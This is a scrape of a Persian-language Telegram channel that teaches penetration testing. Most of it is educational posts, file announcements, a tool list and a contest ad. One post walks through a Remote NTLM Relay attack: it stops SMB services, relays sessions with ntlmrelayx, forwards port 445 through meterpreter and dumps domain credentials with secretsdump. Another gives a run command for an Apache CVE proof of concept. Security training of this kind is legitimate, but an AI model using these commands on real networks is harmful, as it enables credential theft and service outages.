Try Hack Box – Telegram
Try Hack Box
5.76K subscribers
680 photos
65 videos
123 files
689 links
1 Nov 2020
1399/08/11
Learn penetration testing & Red Team
https://youtube.com/@tryhackbox
Channels :
@TryHackBoxOfficial ( RoadMap )
@TryHackBoxStory ( Story Hacking )
Contact : @ThbxSupport
Download Telegram
The Definitive Guide to Linux Process Injection THB.pdf
1.5 MB
راهنمای جامع تزریق پروسس در لینوکس
تکنیک‌ های تزریق پروسس بخش مهمی از ابزارهای یک مهاجم هستند. این تکنیک‌ها به عوامل تهدید امکان می‌دهند تا کد مخرب را درون یک پروسس قانونی اجرا کنند تا از شناسایی شدن جلوگیری کنند یا قلاب‌هایی (hooks) در پروسس های راه دور قرار دهند تا رفتار آن‌ها را تغییر دهند.


@TryHackBox | Github | YouTube | Group
#Linux #Process #Injection
👍3
⚒️ آزمایش آسیب‌پذیری آپاچی - اسکریپت پایتون برای آزمایش آسیب‌پذیری‌های سرور HTTP آپاچی

درون PoC برای CVE-2024-38472, CVE-2024-39573, CVE-2024-38477, CVE-2024-38476, CVE-2024-38475, CVE-2024-38474, CVE-2024-38473 и CVE-2023-38709.

python3 poc_vulnerability_testing.py --target http://<target-ip>


GitHub
@TryHackBox
#tools #pentest
5
Android Application Penetration Testing Checklist.pdf
773 KB
🔥 نمونه‌ای از چک‌ لیست برای تست نفوذ اندروید
@TryHackBox
#android #pentest
5
⭕️ دیگر کانال ها و شبکه های اجتماعی ما را دنبال کنید :

💠 کانال های تلگرام ما

🔶 آموزش تست نفوذ و Red Team
🆔
@TryHackBox

🔶 رودمپ های مختلف
🆔
@TryHackBoxOfficial

🔶 داستان های هک
🆔
@TryHackBoxStory

🔶 آموزش برنامه نویسی
🆔
@TryCodeBox

🔶 رادیو زیروپاد ( پادکست ها )
🆔
@RadioZeroPod


👥 گروه های پرسش و پاسخ

🔷 هک و امنیت
🆔
@TryHackBoxGroup
🔷 برنامه نویسی
🆔
@TryCodeBoxGroup


🔴 اینستاگرام :
🔗
http://www.instagram.com/TryHackBox

🔵 یوتیوب :
🔗
https://youtube.com/@tryhackbox

🟠 گیت هاب ما :
🔗
https://github.com/TryHackBox/
2
Credential Dumping DCSync Attack By Kaveh.pdf
4.1 MB
📖 Credential Dumping DCSync Attack


حمله Active Directory Credential Dumping (DCSync) تکنیکی تخصصی است که مهاجمین برای استخراج اعتبارنامه‌ها از کنترل‌کننده دامنه (DC) به‌کار می‌برند، با این روش که خود را شبیه یک کنترل‌کننده دامنه نشان می‌دهند.


راه‌اندازی یک محیط آزمایشگاهی برای شبیه ‌سازی حمله
درک پروتکل DRS و نحوه عملکرد حمله
چرایی وقوع این misconfiguration در دنیای واقعی
Exploiting از misconfiguration
نگاشت حمله به MITRE ATT&CK
Detecting حمله
استراتژی ‌های کاهش خطر
راه‌اندازی لاب (Lab Setup)

نیازمندی‌ها:
یک محیط مجازی ‌سازی (مثلاً VMware، VirtualBox یا Hyper-V).
یک Windows Server که به‌عنوان کنترل‌کننده دامنه پیکربندی شده باشد.
یک ماشین کلاینت ویندوز.
ابزارها: Impacket، Mimikatz، Netexec و Metasploit.
مراحل:
پیکربندی کنترل‌کننده دامنه:
ویندوز سرور را نصب و پیکربندی کنید تا به‌عنوان کنترل‌کننده دامنه (DC) عمل کند؛ نام دامنه را مثلاً ignite.local قرار دهید و آدرس IP را به‌صورت ایستا (static) تنظیم کنید مثلاً 192.168.1.48. AD را راه‌اندازی کنید و چند کاربر و گروه ایجاد کنید.
@KavehOffSec
@TryHackBox
🔥41
جشن مهرگان یادآور پیروزی عدل و داد بر جور و بیدادگری است و نماد آزادی‌خواهی در فرهنگ ایرانیان به شمار می‌آید. ایرانیان در این روز به رهبری کاوه آهنگر بر ضحاک (آژی دهاک) ظالم پیروز شدند و فریدون از دودمان پیشدادی بر تخت شاهی نشست.از این پس،کاوه آهنگر در فرهنگ ایرانی نماد مقاومت و آزادی‌خواهی،و ضحاک نماد ظلم و ستم محسوب شد.

مهرگان یکی از قدیمی‌ترین جشن‌های ایرانی است که در روز دهم مهر ماه برگزار می‌شود و به پاسداشت ایزد مهر (خدای پیمان،راستی و دوستی)برگزار می‌گردد.این جشن نمادی از نیکی، دوستی،برداشت محصول و پایان فصل گرما و آغاز پاییز است.آیین‌های مهرگان شامل نثارگل، اهدای هدایا،برپایی سفره مهرگانی و اجرای مراسم شادی و مهرورزی است.

مهرگان همچنین نماد برابری و همبستگی اجتماعی است جایی که شاه و رعیت همه با هم به جشن می‌پرداختند.این جشن در ایران باستان اهمیت ویژه‌ای داشت و در دوران ساسانی نیز با شکوه فراوان برگزار می‌شد.حتی پس از ورود اسلام، جشن مهرگان در برخی مناطق ایران و میان زرتشتیان ادامه یافته است.

در نهایت،مهرگان فرصتی است برای پاسداشت دوستی،مهرورزی و سپاسگزاری از نعمت‌های الهی .

@TryHackBox
12🔥2
Try Hack Box
#جلسه_ششم دوره #رایگان سکوریتی پلاس | Security + بخش : Hashing دوره Security+ یک دوره معتبر و پایه‌ای در زمینه امنیت سایبری است که توسط CompTIA ارائه می‌شود. این دوره به شما مهارت‌های لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات، پیاده‌سازی…
#جلسه_هفتم دوره #رایگان سکوریتی پلاس | Security +

بخش : گواهی های دیجیتال

دوره Security+ یک دوره معتبر و پایه‌ای در زمینه امنیت سایبری است که توسط CompTIA ارائه می‌شود. این دوره به شما مهارت‌های لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات، پیاده‌سازی راهکارهای امنیتی،اصول رمزنگاری و درک اصول امنیت شبکه را آموزش می‌دهد.

برای دیدن ویدئو روی لینک زیر کلیک کنید :

https://youtu.be/4ZybmjvZSuY

انتقادی داشتید حتما اطلاع بدید، تا بتونیم آموزش با کیفیت‌تری ارائه بدیم،امیدواریم از آموزش لذت ببرید.


----------
🆔 @TryHackBox
----------
7
Try Hack Box
#جلسه_هفتم دوره #رایگان سکوریتی پلاس | Security + بخش : گواهی های دیجیتال دوره Security+ یک دوره معتبر و پایه‌ای در زمینه امنیت سایبری است که توسط CompTIA ارائه می‌شود. این دوره به شما مهارت‌های لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات،…
دوستانی که دوره سکوریتی پلاس مارو میگذرونند ، ما یک گروه ایجاد کردیم که فایل تمرینی یا اگر سوالی یا مشکلی داشتید بپرسید و فایل ها رو در اختیارتون قرار بدیم اگر مایل بودید به گروه بپیوندید به ما پیام دهید لینک گروه رو ارسال کنیم برای شما :

@Unique_exploitbot
4
واژه نامه امنیت سایبری TryHackBox (1).pdf
2 MB
🔖 واژه‌نامه امنیت سایبری TryHackBox
مجموعه‌ای کاربردی از مفاهیم، اصطلاحات و واژه‌های کلیدی دنیای امنیت سایبری، مخصوص علاقه‌مندان به تست نفوذ، رد تیم و دفاع سایبری.

@TryHackBox | Github | YouTube | Group
👏11🔥4👍3
با به اشتراک گذاری مطالب و ریکشن از ما حمایت کنید .
❤‍🔥9
Browser Extensions For Bug Bounty

🌐 سری اکستنشن های مفید برای باگ بانتی که داشتنشون در مرورگرتون میتونه کمک مفیدی به فعالیتتون بکنه

✍️نویسنده
@TryHackBox | The Chaos
6👍1
Try Hack Box
Browser Extensions For Bug Bounty 🌐 سری اکستنشن های مفید برای باگ بانتی که داشتنشون در مرورگرتون میتونه کمک مفیدی به فعالیتتون بکنه ✍️نویسنده @TryHackBox | The Chaos
🛠 اکستنشن های کمکی برای تست نفوذ و امنیت وب

🔍 شناسایی تکنولوژی‌ها
• Wappalyzer
پروفایلر تکنولوژی - شناسایی CMS، فریمورک‌ها و کتابخانه‌های جاوااسکریپت

🎯 تست نفوذ و آنالیز
• Hackbar
افزونه تست نفوذ برای Chrome و Firefox
• OWASP Penetration Testing Kit
اسکن امنیتی برنامه‌های وب (DAST & SCA)
• KNOXSS Community Edition
ابزار کشف XSS

🔒 امنیت و اسکن آسیب‌پذیری
• Retire.js
اسکن کتابخانه‌های جاوااسکریپت آسیب‌پذیر
• Trufflehog
شناسایی خودکار API keys و credentials
• DotGit
تشخیص دایرکتوری‌های git در معرض دید
• Bishop Vulnerability Scanner
اسکنر سیستم‌های کنترل نسخه و ابزارهای ادمین

🌐 مدیریت درخواست‌ها و هدرها
• FoxyProxy
مدیریت آسان پروکسی سرور
• Modheader
تغییر هدرهای HTTP و URL
• Request Maker
ضبط، تغییر و ارسال درخواست‌های HTTP

🔎 جستجو و اوسینت
• Shodan
یافتن اطلاعات هاستینگ و پورت‌های باز
• Hunter
یافتن آدرس‌های ایمیل در وبسایت‌ها
• Mitaka
جستجوی IP، دامنه، URL و هش از طریق منو راست‌کلیک

⚡️ ابزارهای کمکی
• Open Multiple URLs
باز کردن چندین URL همزمان
• Cookie-Editor
مدیریت کوکی‌ها برای تب جاری
• S3 Bucket List
ثبت اکسپوز S3 buckets
• d3coder
انکود و دیکد متن (base64, rot13, ...)

✍️نویسنده
@TryHackBox | The Chaos
#BugBounty #Browser #Extension #Tools
10👍6
🚀 آغاز مرحله مقدماتی مسابقه BlueCup

🔵 در مرحله اول این رقابت، شرکت‌کنندگان با مجموعه‌ای از چالش‌های مربوط به شناسایی حملات روبه‌رو می‌شن. شروع مسیر با سوالاتی از حوزه پاسخگویی به رخداد خواهد بود و بعد از اون باید سراغ حل چالش‌های فنی برید.

🏆 نفرات برتر این مرحله به دور بعد راه پیدا می‌کنن و در قالب گروهی رقابت می‌کنن؛ رقابت‌ها تا فینال ادامه خواهد داشت و در نهایت برترین‌ها در قالبی متفاوت به مصاف هم میرن.

📅 تاریخ برگزاری: جمعه 18 مهر
زمان: 10 صبح تا 17 (7 ساعت)
📍 محل: بخش مسابقات در پروفایل کاربری Challenginno

⚡️ نکات مهم:

برای شرکت در مسابقه نیازی به ثبت‌نام مجدد و پرداخت هزینه نیست.

کاربرانی که هنوز ثبت‌نام نکرده‌اند، تا شروع مسابقه فرصت دارن حساب خودشون رو بسازن.

سطح مسابقه: مقدماتی تا متوسط

🎁 جوایز نقدی:
🥇 نفر اول: 30 میلیون تومان
🥈 نفر دوم: 10 میلیون تومان
(در فینال امکان انتخاب حالت Raise هم وجود داره که شرایط اون اعلام خواهد شد.)

🔗 همین حالا آماده شو و وارد رقابت BlueCup بشو!

🌐 https://challenginno.ir
🌐 https://news.1rj.ru/str/challenginno
7
NTLM Relay Attack ?

خیلی‌ها اسم حملات NTLM Relay رو شنیدن، اما مثل اغلب حملات دیگه، برای اجرا شدن نیاز به برآورده شدن شرایط مشخصی هست.
اغلب این حملات یا با کمک Responder انجام می‌شن که در این حالت کلید موفقیت وابسته به موفقیت Poisoning درخواست‌ های Broadcast هست که بعضی پروتکل‌ ها در شبکه‌ های ویندوزی ازشون استفاده میکنن یا از مکانیزم Coerce (اجبار به احراز هویت) استفاده میشه.
در حالت اول ما باید دسترسی به همون شبکه‌ای که «قربانی» توشه داشته باشیم، و در حالت دوم امکان relay حساب یک کامپیوتر دامینی رو به‌دست می‌یاریم که باز هم همیشه نتیجهٔ دلخواه رو نمیده.
@TryHackBox
#NTLM #AD #Attack
🔥5
🔖 اصل قضیه: Remote NTLM Relay

امروز می‌ خوام یک وکتور دیگه از NTLM Relay رو بررسی کنم. این وکتور به‌ خاطر ویژگی‌ های exploiting زیاد استفاده نشده، ولی دونستنش مفیده.

اینجا حرف از Remote NTLM Relay هست: حمله‌ای که با متوقف‌سازی اجباری سرویس‌ های SMB روی سرور و راه‌اندازی مجدد اون‌ ها کار میکنه، به‌طوری که ترافیک واردشون روی پورت 445 پس از ری‌ استارت به ماشین مهاجم هدایت بشه. به این ترتیب مهاجم میتونه سشن‌ های ورودی رو به هر جایی که می‌خواد رله کنه.

برای exploiting باید چند مرحله ساده رو انجام بدیم.

💢 مرحله 1 > آماده‌ سازی سرور

برای آماده‌ سازی سرور جهت exploiting، باید سرویس‌ های SMB رو غیرفعال و سرور رو ری‌ استارت کنیم. مراحل به‌ صورت کلی اینه:

1. غیرفعال‌سازی NetLogon:
   sc stop netlogon

2. غیرفعال و متوقف‌کردن SMB Server (LanManServer):
   sc stop lanmanserver
sc config lanmanserver start= disabled

3. توقف کامل LanManWorkstation:
   sc stop lanmanworkstation
sc config lanmanworkstation start= disabled

این مراحل توی اسکرین‌ شات اول قابل مشاهده‌ست.
بعد از غیرفعالسازی سرویس‌ها باید ماشین رو ری‌ استارت کنیم (shutdown /r /t 0) خیلی مهمه که دستگاه ری‌ استارت بشه نه اینکه خاموش بشه.
پس از بوت شدن مجدد و به‌دست آوردن شل روی سرور (در این سناریو من از meterpreter استفاده کردم)، می‌تونیم به مرحله بعد بریم.

💢 مرحله 2 > تنظیم ماشین مهاجم

روی ماشین مهاجم برای رله کردن NTLM از اسکریپت ntlmrelayx.py از مجموعهٔ Impacket استفاده می‌کنیم. در مثالی که من اجرا کردم، هدف سرور 10.201.126.30 بود (چون برای این هدف SMB نیازی به signing نداشت). پراکسی‌ ای که استفاده میکنیم روی پورت 1090 listening میکنه، بنابراین دستور اجرا شبیه اینه:
proxychains impacket-ntlmrelayx -t smb://10.201.126.30 -smb2support -socks -socks-port 1090

💢 مرحله 3 > TCP relay با meterpreter

با شلی که در مرحلهٔ اول گرفتیم، ترافیک ورودی به پورت 445/TCP روی سرور رو به ماشین مهاجم (که رله رو انجام می‌ده) فوروارد/ریدایرکت می‌ کنیم. مثال دستور:
portfwd add -R -L 10.51.124.39 -l 445 -p 445

اگر همه چیز رو درست انجام بدیم، باید بتونیم یک سشن بگیریم و با موفقیت اون رو رله کنیم مثل چیزی که توی اسکرین شات سوم می‌ بینید.

💢 مرحله 4 > Post-exploitation

بعد از اینکه رله موفق باشه، ntlmrelayx.py معمولاً سشن رو باز نگه میداره؛ بنابراین با ساخت یک کانفیگ سفارشی برای proxychains می‌ تونیم از ابزارهای دیگهٔ Impacket-like برای کارهای post-exploitation استفاده کنیم.
در سناریوی من، کاربری که سشنش رله شد سطح بالایی از دسترسی‌ ها روی ماشین تارگت داشت؛ بنابراین منطقیه از secretsdump.py برای استخراج اعتبارنامه‌ها و lateral movement در دامنه استفاده کنیم:
proxychains -f p4-ntlm-relay.conf impacket-secretsdump -no-pass HOLOLIVE/SRV-ADMIN@10.201.126.30

چرا این وکتور کمتر رایجه؟

دلیل اینکه این وکتور خیلی گسترده نشده، ماهیت مخرب و تخریبی اون هست:

غیرفعال‌کردن سرویس‌ های SMB روی یک سرور فعال باعث DoS و توقف سرویس میشه. در محیط‌ های واقعی این عواقب میتونن مشکلات جدی ایجاد کنن بنابراین اجرای این حمله تنها باید با مجوز صریح (explicit authorization) از مشتری/مالک شبکه انجام بشه.

@TryHackBox
#AD #NTLM #Attack
🔥41
Forwarded from TryHackBox
AI Cybersecurity Careers.pdf
970.3 KB
مشاغل امنیت سایبری هوش مصنوعی

@TryHackBoxOfficial | Github | YouTube | Group
#AI #SANS #THB
2